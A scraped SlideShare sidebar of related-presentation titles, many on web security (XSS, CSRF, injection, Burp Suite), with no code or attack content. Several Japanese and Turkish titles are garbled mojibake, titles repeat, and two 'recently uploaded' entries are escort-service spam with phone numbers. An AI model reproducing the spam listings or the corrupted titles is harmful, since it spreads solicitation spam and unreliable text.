Secure Code Review 101Narudom Roongsiriwong, CISSP
Ā 
JSON Web Tokens
JSON Web TokensJSON Web Tokens
JSON Web TokensIvan Rosolen
Ā 
Introduction to burp suite
Introduction to burp suiteIntroduction to burp suite
Introduction to burp suiteUtkarsh Bhargava
Ā 
å°Žå…„ć‹ć‚‰ 10 å¹“ć€PHP 恮 trait ćÆę»…ć³ć‚‹ć¹ććŖ恮恋 ćć®é©åˆ‡ćŖä½æć„ć©ć“ć‚ćØå¼±ē‚¹ć€å°†ę„恫恤恄恦
å°Žå…„ć‹ć‚‰ 10 å¹“ć€PHP 恮 trait ćÆę»…ć³ć‚‹ć¹ććŖ恮恋 ćć®é©åˆ‡ćŖä½æć„ć©ć“ć‚ćØå¼±ē‚¹ć€å°†ę„ć«ć¤ć„ć¦å°Žå…„ć‹ć‚‰ 10 å¹“ć€PHP 恮 trait ćÆę»…ć³ć‚‹ć¹ććŖ恮恋 ćć®é©åˆ‡ćŖä½æć„ć©ć“ć‚ćØå¼±ē‚¹ć€å°†ę„恫恤恄恦
å°Žå…„ć‹ć‚‰ 10 å¹“ć€PHP 恮 trait ćÆę»…ć³ć‚‹ć¹ććŖ恮恋 ćć®é©åˆ‡ćŖä½æć„ć©ć“ć‚ćØå¼±ē‚¹ć€å°†ę„恫恤恄恦shinjiigarashi
Ā 
Spring boot introduction
Spring boot introductionSpring boot introduction
Spring boot introductionRasheed Waraich
Ā 
The Secret Life of a Bug Bounty Hunter ā€“ Frans RosĆ©n @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter ā€“ Frans RosĆ©n @ Security Fest 2016The Secret Life of a Bug Bounty Hunter ā€“ Frans RosĆ©n @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter ā€“ Frans RosĆ©n @ Security Fest 2016Frans RosĆ©n
Ā 
Burpć§ęŒ‡å®šę–‡å­—åˆ—ć‚’ę¤œē“¢
Burpć§ęŒ‡å®šę–‡å­—åˆ—ć‚’ę¤œē“¢Burpć§ęŒ‡å®šę–‡å­—åˆ—ć‚’ę¤œē“¢
Burpć§ęŒ‡å®šę–‡å­—åˆ—ć‚’ę¤œē“¢abend_cve_9999_0001
Ā 
Java ORćƒžćƒƒćƒ‘ćƒ¼éøå®šć®ćƒć‚¤ćƒ³ćƒˆ #jsug
Java ORćƒžćƒƒćƒ‘ćƒ¼éøå®šć®ćƒć‚¤ćƒ³ćƒˆ #jsugJava ORćƒžćƒƒćƒ‘ćƒ¼éøå®šć®ćƒć‚¤ćƒ³ćƒˆ #jsug
Java ORćƒžćƒƒćƒ‘ćƒ¼éøå®šć®ćƒć‚¤ćƒ³ćƒˆ #jsugMasatoshi Tada
Ā 
MongoDB and Node.js
MongoDB and Node.jsMongoDB and Node.js
MongoDB and Node.jsNorberto Leite
Ā 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG PresentationDamon Cortesi
Ā 
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRFBe Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRFMark Stanton
Ā 

More Related Content

What's hot

Web GĆ¼venlik AƧıkları ve Kullanımı (Geniş Anlatım)
Web GĆ¼venlik AƧıkları ve Kullanımı (Geniş Anlatım)Web GĆ¼venlik AƧıkları ve Kullanımı (Geniş Anlatım)
Web GĆ¼venlik AƧıkları ve Kullanımı (Geniş Anlatım)Mehmet KelepƧe
Ā 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionMichael Hendrickx
Ā 
A Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityA Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityMikhail Egorov
Ā 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
Ā 
Smart Sheriff, Dumb Idea, the wild west of government assisted parenting
Smart Sheriff, Dumb Idea, the wild west of government assisted parentingSmart Sheriff, Dumb Idea, the wild west of government assisted parenting
Smart Sheriff, Dumb Idea, the wild west of government assisted parentingAbraham Aranguren
Ā 
ćØć«ć‹ćåˆ†ć‹ć‚Šć„ć‚‰ć„Twelve-Factor Appć®č§£čŖ¬ć‚’試ćæ悋
ćØć«ć‹ćåˆ†ć‹ć‚Šć„ć‚‰ć„Twelve-Factor Appć®č§£čŖ¬ć‚’試ćæ悋ćØć«ć‹ćåˆ†ć‹ć‚Šć„ć‚‰ć„Twelve-Factor Appć®č§£čŖ¬ć‚’試ćæ悋
ćØć«ć‹ćåˆ†ć‹ć‚Šć„ć‚‰ć„Twelve-Factor Appć®č§£čŖ¬ć‚’試ćæ悋Masatoshi Tada
Ā 
åŸŗē¤Žć‹ć‚‰č¦‹ē›“恙 ASP.NET MVC ć®å˜ä½“ćƒ†ć‚¹ćƒˆč‡Ŗå‹•åŒ–ę–¹ę³• ļ½ž Windows Azure é–¢é€£ć‚‚ć‚ć‚‹ć‹ć‚‚ļ½ž
åŸŗē¤Žć‹ć‚‰č¦‹ē›“恙 ASP.NET MVC ć®å˜ä½“ćƒ†ć‚¹ćƒˆč‡Ŗå‹•åŒ–ę–¹ę³• ļ½ž Windows Azure é–¢é€£ć‚‚ć‚ć‚‹ć‹ć‚‚ļ½žåŸŗē¤Žć‹ć‚‰č¦‹ē›“恙 ASP.NET MVC ć®å˜ä½“ćƒ†ć‚¹ćƒˆč‡Ŗå‹•åŒ–ę–¹ę³• ļ½ž Windows Azure é–¢é€£ć‚‚ć‚ć‚‹ć‹ć‚‚ļ½ž
åŸŗē¤Žć‹ć‚‰č¦‹ē›“恙 ASP.NET MVC ć®å˜ä½“ćƒ†ć‚¹ćƒˆč‡Ŗå‹•åŒ–ę–¹ę³• ļ½ž Windows Azure é–¢é€£ć‚‚ć‚ć‚‹ć‹ć‚‚ļ½žnormalian
Ā 
Hackfest presentation.pptx
Hackfest presentation.pptxHackfest presentation.pptx
Hackfest presentation.pptxPeter Yaworski
Ā 
Event Driven Microservices with Spring Cloud Stream #jjug_ccc #ccc_ab3
Event Driven Microservices with Spring Cloud Stream #jjug_ccc #ccc_ab3Event Driven Microservices with Spring Cloud Stream #jjug_ccc #ccc_ab3
Event Driven Microservices with Spring Cloud Stream #jjug_ccc #ccc_ab3Toshiaki Maki
Ā 
Security Exploit of Business Logic Flaws, Business Logic Attacks
Security Exploit of Business Logic Flaws, Business Logic AttacksSecurity Exploit of Business Logic Flaws, Business Logic Attacks
Security Exploit of Business Logic Flaws, Business Logic AttacksMarco Morana
Ā 
JSON Web Tokens
JSON Web TokensJSON Web Tokens
JSON Web TokensIvan Rosolen
Ā 
Introduction to burp suite
Introduction to burp suiteIntroduction to burp suite
Introduction to burp suiteUtkarsh Bhargava
Ā 
å°Žå…„ć‹ć‚‰ 10 å¹“ć€PHP 恮 trait ćÆę»…ć³ć‚‹ć¹ććŖ恮恋 ćć®é©åˆ‡ćŖä½æć„ć©ć“ć‚ćØå¼±ē‚¹ć€å°†ę„恫恤恄恦
å°Žå…„ć‹ć‚‰ 10 å¹“ć€PHP 恮 trait ćÆę»…ć³ć‚‹ć¹ććŖ恮恋 ćć®é©åˆ‡ćŖä½æć„ć©ć“ć‚ćØå¼±ē‚¹ć€å°†ę„ć«ć¤ć„ć¦å°Žå…„ć‹ć‚‰ 10 å¹“ć€PHP 恮 trait ćÆę»…ć³ć‚‹ć¹ććŖ恮恋 ćć®é©åˆ‡ćŖä½æć„ć©ć“ć‚ćØå¼±ē‚¹ć€å°†ę„恫恤恄恦
å°Žå…„ć‹ć‚‰ 10 å¹“ć€PHP 恮 trait ćÆę»…ć³ć‚‹ć¹ććŖ恮恋 ćć®é©åˆ‡ćŖä½æć„ć©ć“ć‚ćØå¼±ē‚¹ć€å°†ę„恫恤恄恦shinjiigarashi
Ā 
Spring boot introduction
Spring boot introductionSpring boot introduction
Spring boot introductionRasheed Waraich
Ā 
The Secret Life of a Bug Bounty Hunter ā€“ Frans RosĆ©n @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter ā€“ Frans RosĆ©n @ Security Fest 2016The Secret Life of a Bug Bounty Hunter ā€“ Frans RosĆ©n @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter ā€“ Frans RosĆ©n @ Security Fest 2016Frans RosĆ©n
Ā 
Burpć§ęŒ‡å®šę–‡å­—åˆ—ć‚’ę¤œē“¢
Burpć§ęŒ‡å®šę–‡å­—åˆ—ć‚’ę¤œē“¢Burpć§ęŒ‡å®šę–‡å­—åˆ—ć‚’ę¤œē“¢
Burpć§ęŒ‡å®šę–‡å­—åˆ—ć‚’ę¤œē“¢abend_cve_9999_0001
Ā 
Java ORćƒžćƒƒćƒ‘ćƒ¼éøå®šć®ćƒć‚¤ćƒ³ćƒˆ #jsug
Java ORćƒžćƒƒćƒ‘ćƒ¼éøå®šć®ćƒć‚¤ćƒ³ćƒˆ #jsugJava ORćƒžćƒƒćƒ‘ćƒ¼éøå®šć®ćƒć‚¤ćƒ³ćƒˆ #jsug
Java ORćƒžćƒƒćƒ‘ćƒ¼éøå®šć®ćƒć‚¤ćƒ³ćƒˆ #jsugMasatoshi Tada
Ā 
MongoDB and Node.js
MongoDB and Node.jsMongoDB and Node.js
MongoDB and Node.jsNorberto Leite
Ā 

What's hot (20)

Web GĆ¼venlik AƧıkları ve Kullanımı (Geniş Anlatım)
Web GĆ¼venlik AƧıkları ve Kullanımı (Geniş Anlatım)Web GĆ¼venlik AƧıkları ve Kullanımı (Geniş Anlatım)
Web GĆ¼venlik AƧıkları ve Kullanımı (Geniş Anlatım)
Ā 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: Injection
Ā 
A Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityA Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications security
Ā 
Web api
Web apiWeb api
Web api
Ā 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
Ā 
Smart Sheriff, Dumb Idea, the wild west of government assisted parenting
Smart Sheriff, Dumb Idea, the wild west of government assisted parentingSmart Sheriff, Dumb Idea, the wild west of government assisted parenting
Smart Sheriff, Dumb Idea, the wild west of government assisted parenting
Ā 
ćØć«ć‹ćåˆ†ć‹ć‚Šć„ć‚‰ć„Twelve-Factor Appć®č§£čŖ¬ć‚’試ćæ悋
ćØć«ć‹ćåˆ†ć‹ć‚Šć„ć‚‰ć„Twelve-Factor Appć®č§£čŖ¬ć‚’試ćæ悋ćØć«ć‹ćåˆ†ć‹ć‚Šć„ć‚‰ć„Twelve-Factor Appć®č§£čŖ¬ć‚’試ćæ悋
ćØć«ć‹ćåˆ†ć‹ć‚Šć„ć‚‰ć„Twelve-Factor Appć®č§£čŖ¬ć‚’試ćæ悋
Ā 
åŸŗē¤Žć‹ć‚‰č¦‹ē›“恙 ASP.NET MVC ć®å˜ä½“ćƒ†ć‚¹ćƒˆč‡Ŗå‹•åŒ–ę–¹ę³• ļ½ž Windows Azure é–¢é€£ć‚‚ć‚ć‚‹ć‹ć‚‚ļ½ž
åŸŗē¤Žć‹ć‚‰č¦‹ē›“恙 ASP.NET MVC ć®å˜ä½“ćƒ†ć‚¹ćƒˆč‡Ŗå‹•åŒ–ę–¹ę³• ļ½ž Windows Azure é–¢é€£ć‚‚ć‚ć‚‹ć‹ć‚‚ļ½žåŸŗē¤Žć‹ć‚‰č¦‹ē›“恙 ASP.NET MVC ć®å˜ä½“ćƒ†ć‚¹ćƒˆč‡Ŗå‹•åŒ–ę–¹ę³• ļ½ž Windows Azure é–¢é€£ć‚‚ć‚ć‚‹ć‹ć‚‚ļ½ž
åŸŗē¤Žć‹ć‚‰č¦‹ē›“恙 ASP.NET MVC ć®å˜ä½“ćƒ†ć‚¹ćƒˆč‡Ŗå‹•åŒ–ę–¹ę³• ļ½ž Windows Azure é–¢é€£ć‚‚ć‚ć‚‹ć‹ć‚‚ļ½ž
Ā 
Hackfest presentation.pptx
Hackfest presentation.pptxHackfest presentation.pptx
Hackfest presentation.pptx
Ā 
Event Driven Microservices with Spring Cloud Stream #jjug_ccc #ccc_ab3
Event Driven Microservices with Spring Cloud Stream #jjug_ccc #ccc_ab3Event Driven Microservices with Spring Cloud Stream #jjug_ccc #ccc_ab3
Event Driven Microservices with Spring Cloud Stream #jjug_ccc #ccc_ab3
Ā 
Security Exploit of Business Logic Flaws, Business Logic Attacks
Security Exploit of Business Logic Flaws, Business Logic AttacksSecurity Exploit of Business Logic Flaws, Business Logic Attacks
Security Exploit of Business Logic Flaws, Business Logic Attacks
Ā 
Secure Code Review 101
Secure Code Review 101Secure Code Review 101
Secure Code Review 101
Ā 
JSON Web Tokens
JSON Web TokensJSON Web Tokens
JSON Web Tokens
Ā 
Introduction to burp suite
Introduction to burp suiteIntroduction to burp suite
Introduction to burp suite
Ā 
å°Žå…„ć‹ć‚‰ 10 å¹“ć€PHP 恮 trait ćÆę»…ć³ć‚‹ć¹ććŖ恮恋 ćć®é©åˆ‡ćŖä½æć„ć©ć“ć‚ćØå¼±ē‚¹ć€å°†ę„恫恤恄恦
å°Žå…„ć‹ć‚‰ 10 å¹“ć€PHP 恮 trait ćÆę»…ć³ć‚‹ć¹ććŖ恮恋 ćć®é©åˆ‡ćŖä½æć„ć©ć“ć‚ćØå¼±ē‚¹ć€å°†ę„ć«ć¤ć„ć¦å°Žå…„ć‹ć‚‰ 10 å¹“ć€PHP 恮 trait ćÆę»…ć³ć‚‹ć¹ććŖ恮恋 ćć®é©åˆ‡ćŖä½æć„ć©ć“ć‚ćØå¼±ē‚¹ć€å°†ę„恫恤恄恦
å°Žå…„ć‹ć‚‰ 10 å¹“ć€PHP 恮 trait ćÆę»…ć³ć‚‹ć¹ććŖ恮恋 ćć®é©åˆ‡ćŖä½æć„ć©ć“ć‚ćØå¼±ē‚¹ć€å°†ę„恫恤恄恦
Ā 
Spring boot introduction
Spring boot introductionSpring boot introduction
Spring boot introduction
Ā 
The Secret Life of a Bug Bounty Hunter ā€“ Frans RosĆ©n @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter ā€“ Frans RosĆ©n @ Security Fest 2016The Secret Life of a Bug Bounty Hunter ā€“ Frans RosĆ©n @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter ā€“ Frans RosĆ©n @ Security Fest 2016
Ā 
Burpć§ęŒ‡å®šę–‡å­—åˆ—ć‚’ę¤œē“¢
Burpć§ęŒ‡å®šę–‡å­—åˆ—ć‚’ę¤œē“¢Burpć§ęŒ‡å®šę–‡å­—åˆ—ć‚’ę¤œē“¢
Burpć§ęŒ‡å®šę–‡å­—åˆ—ć‚’ę¤œē“¢
Ā 
Java ORćƒžćƒƒćƒ‘ćƒ¼éøå®šć®ćƒć‚¤ćƒ³ćƒˆ #jsug
Java ORćƒžćƒƒćƒ‘ćƒ¼éøå®šć®ćƒć‚¤ćƒ³ćƒˆ #jsugJava ORćƒžćƒƒćƒ‘ćƒ¼éøå®šć®ćƒć‚¤ćƒ³ćƒˆ #jsug
Java ORćƒžćƒƒćƒ‘ćƒ¼éøå®šć®ćƒć‚¤ćƒ³ćƒˆ #jsug
Ā 
MongoDB and Node.js
MongoDB and Node.jsMongoDB and Node.js
MongoDB and Node.js
Ā 

Similar to Web Security Horror Stories

PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG PresentationDamon Cortesi
Ā 
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRFBe Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRFMark Stanton
Ā 
JavaScript Security
JavaScript SecurityJavaScript Security
JavaScript SecurityJason Harwig
Ā 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
Ā 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processguest3379bd
Ā 
2009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 1012009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 101brian_dailey
Ā 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web AppsFrank Kim
Ā 
Reverse Engineering Malicious Javascript
Reverse Engineering Malicious JavascriptReverse Engineering Malicious Javascript
Reverse Engineering Malicious JavascriptYusuf Motiwala
Ā 
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptIntegrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptFrancois Marier
Ā 
Ajax Security
Ajax SecurityAjax Security
Ajax SecurityJoe Walker
Ā 
Intro to Php Security
Intro to Php SecurityIntro to Php Security
Intro to Php SecurityDave Ross
Ā 
2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIA2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIAguestfdcb8a
Ā 
Web Security 101
Web Security 101Web Security 101
Web Security 101Michael Peters
Ā 
Avoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might thinkAvoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might thinkErlend Oftedal
Ā 
Meteor Meets Mallory
Meteor Meets MalloryMeteor Meets Mallory
Meteor Meets MalloryEmily Stark
Ā 

Similar to Web Security Horror Stories (20)

PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
Ā 
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRFBe Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Ā 
JavaScript Security
JavaScript SecurityJavaScript Security
JavaScript Security
Ā 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
Ā 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
Ā 
2009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 1012009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 101
Ā 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web Apps
Ā 
Reverse Engineering Malicious Javascript
Reverse Engineering Malicious JavascriptReverse Engineering Malicious Javascript
Reverse Engineering Malicious Javascript
Ā 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
Ā 
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptIntegrity protection for third-party JavaScript
Integrity protection for third-party JavaScript
Ā 
Web Security
Web SecurityWeb Security
Web Security
Ā 
Ajax Security
Ajax SecurityAjax Security
Ajax Security
Ā 
Brakeman
BrakemanBrakeman
Brakeman
Ā 
XSS - Attacks & Defense
XSS - Attacks & DefenseXSS - Attacks & Defense
XSS - Attacks & Defense
Ā 
Intro to Php Security
Intro to Php SecurityIntro to Php Security
Intro to Php Security
Ā 
2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIA2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIA
Ā 
Hacking - Web based attacks
Hacking - Web based attacksHacking - Web based attacks
Hacking - Web based attacks
Ā 
Web Security 101
Web Security 101Web Security 101
Web Security 101
Ā 
Avoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might thinkAvoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might think
Ā 
Meteor Meets Mallory
Meteor Meets MalloryMeteor Meets Mallory
Meteor Meets Mallory
Ā 

More from Simon Willison

How Lanyrd does Geo
How Lanyrd does GeoHow Lanyrd does Geo
How Lanyrd does GeoSimon Willison
Ā 
Cheap tricks for startups
Cheap tricks for startupsCheap tricks for startups
Cheap tricks for startupsSimon Willison
Ā 
The Django Web Framework (EuroPython 2006)
The Django Web Framework (EuroPython 2006)The Django Web Framework (EuroPython 2006)
The Django Web Framework (EuroPython 2006)Simon Willison
Ā 
How we bootstrapped Lanyrd using Twitter's social graph
How we bootstrapped Lanyrd using Twitter's social graphHow we bootstrapped Lanyrd using Twitter's social graph
How we bootstrapped Lanyrd using Twitter's social graphSimon Willison
Ā 
Web Services for Fun and Profit
Web Services for Fun and ProfitWeb Services for Fun and Profit
Web Services for Fun and ProfitSimon Willison
Ā 
Tricks & challenges developing a large Django application
Tricks & challenges developing a large Django applicationTricks & challenges developing a large Django application
Tricks & challenges developing a large Django applicationSimon Willison
Ā 
Advanced Aspects of the Django Ecosystem: Haystack, Celery & Fabric
Advanced Aspects of the Django Ecosystem: Haystack, Celery & FabricAdvanced Aspects of the Django Ecosystem: Haystack, Celery & Fabric
Advanced Aspects of the Django Ecosystem: Haystack, Celery & FabricSimon Willison
Ā 
How Lanyrd uses Twitter
How Lanyrd uses TwitterHow Lanyrd uses Twitter
How Lanyrd uses TwitterSimon Willison
Ā 
Building Things Fast - and getting approval
Building Things Fast - and getting approvalBuilding Things Fast - and getting approval
Building Things Fast - and getting approvalSimon Willison
Ā 
Rediscovering JavaScript: The Language Behind The Libraries
Rediscovering JavaScript: The Language Behind The LibrariesRediscovering JavaScript: The Language Behind The Libraries
Rediscovering JavaScript: The Language Behind The LibrariesSimon Willison
Ā 
Building crowdsourcing applications
Building crowdsourcing applicationsBuilding crowdsourcing applications
Building crowdsourcing applicationsSimon Willison
Ā 
Evented I/O based web servers, explained using bunnies
Evented I/O based web servers, explained using bunniesEvented I/O based web servers, explained using bunnies
Evented I/O based web servers, explained using bunniesSimon Willison
Ā 
Cowboy development with Django
Cowboy development with DjangoCowboy development with Django
Cowboy development with DjangoSimon Willison
Ā 
Crowdsourcing with Django
Crowdsourcing with DjangoCrowdsourcing with Django
Crowdsourcing with DjangoSimon Willison
Ā 
Class-based views with Django
Class-based views with DjangoClass-based views with Django
Class-based views with DjangoSimon Willison
Ā 
Web App Security Horror Stories
Web App Security Horror StoriesWeb App Security Horror Stories
Web App Security Horror StoriesSimon Willison
Ā 
When Zeppelins Ruled The Earth
When Zeppelins Ruled The EarthWhen Zeppelins Ruled The Earth
When Zeppelins Ruled The EarthSimon Willison
Ā 

More from Simon Willison (20)

How Lanyrd does Geo
How Lanyrd does GeoHow Lanyrd does Geo
How Lanyrd does Geo
Ā 
Cheap tricks for startups
Cheap tricks for startupsCheap tricks for startups
Cheap tricks for startups
Ā 
The Django Web Framework (EuroPython 2006)
The Django Web Framework (EuroPython 2006)The Django Web Framework (EuroPython 2006)
The Django Web Framework (EuroPython 2006)
Ā 
Building Lanyrd
Building LanyrdBuilding Lanyrd
Building Lanyrd
Ā 
How we bootstrapped Lanyrd using Twitter's social graph
How we bootstrapped Lanyrd using Twitter's social graphHow we bootstrapped Lanyrd using Twitter's social graph
How we bootstrapped Lanyrd using Twitter's social graph
Ā 
Web Services for Fun and Profit
Web Services for Fun and ProfitWeb Services for Fun and Profit
Web Services for Fun and Profit
Ā 
Tricks & challenges developing a large Django application
Tricks & challenges developing a large Django applicationTricks & challenges developing a large Django application
Tricks & challenges developing a large Django application
Ā 
Advanced Aspects of the Django Ecosystem: Haystack, Celery & Fabric
Advanced Aspects of the Django Ecosystem: Haystack, Celery & FabricAdvanced Aspects of the Django Ecosystem: Haystack, Celery & Fabric
Advanced Aspects of the Django Ecosystem: Haystack, Celery & Fabric
Ā 
How Lanyrd uses Twitter
How Lanyrd uses TwitterHow Lanyrd uses Twitter
How Lanyrd uses Twitter
Ā 
ScaleFail
ScaleFailScaleFail
ScaleFail
Ā 
Building Things Fast - and getting approval
Building Things Fast - and getting approvalBuilding Things Fast - and getting approval
Building Things Fast - and getting approval
Ā 
Rediscovering JavaScript: The Language Behind The Libraries
Rediscovering JavaScript: The Language Behind The LibrariesRediscovering JavaScript: The Language Behind The Libraries
Rediscovering JavaScript: The Language Behind The Libraries
Ā 
Building crowdsourcing applications
Building crowdsourcing applicationsBuilding crowdsourcing applications
Building crowdsourcing applications
Ā 
Evented I/O based web servers, explained using bunnies
Evented I/O based web servers, explained using bunniesEvented I/O based web servers, explained using bunnies
Evented I/O based web servers, explained using bunnies
Ā 
Cowboy development with Django
Cowboy development with DjangoCowboy development with Django
Cowboy development with Django
Ā 
Crowdsourcing with Django
Crowdsourcing with DjangoCrowdsourcing with Django
Crowdsourcing with Django
Ā 
Django Heresies
Django HeresiesDjango Heresies
Django Heresies
Ā 
Class-based views with Django
Class-based views with DjangoClass-based views with Django
Class-based views with Django
Ā 
Web App Security Horror Stories
Web App Security Horror StoriesWeb App Security Horror Stories
Web App Security Horror Stories
Ā 
When Zeppelins Ruled The Earth
When Zeppelins Ruled The EarthWhen Zeppelins Ruled The Earth
When Zeppelins Ruled The Earth
Ā 

Recently uploaded

CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
Ā 
FULL ENJOY šŸ” 8264348440 šŸ” Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY šŸ” 8264348440 šŸ” Call Girls in Diplomatic Enclave | DelhiFULL ENJOY šŸ” 8264348440 šŸ” Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY šŸ” 8264348440 šŸ” Call Girls in Diplomatic Enclave | Delhisoniya singh
Ā 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
Ā 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxOnBoard
Ā 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
Ā 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
Ā 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
Ā 
Finology Group ā€“ Insurtech Innovation Award 2024
Finology Group ā€“ Insurtech Innovation Award 2024Finology Group ā€“ Insurtech Innovation Award 2024
Finology Group ā€“ Insurtech Innovation Award 2024The Digital Insurer
Ā 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGSujit Pal
Ā 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
Ā 
#StandardsGoals for 2024: Whatā€™s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: Whatā€™s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: Whatā€™s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: Whatā€™s new for BISAC - Tech Forum 2024BookNet Canada
Ā 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
Ā 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
Ā 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
Ā 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
Ā 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
Ā 
WhatsApp 9892124323 āœ“Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 āœ“Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 āœ“Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 āœ“Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
Ā 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
Ā 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
Ā 
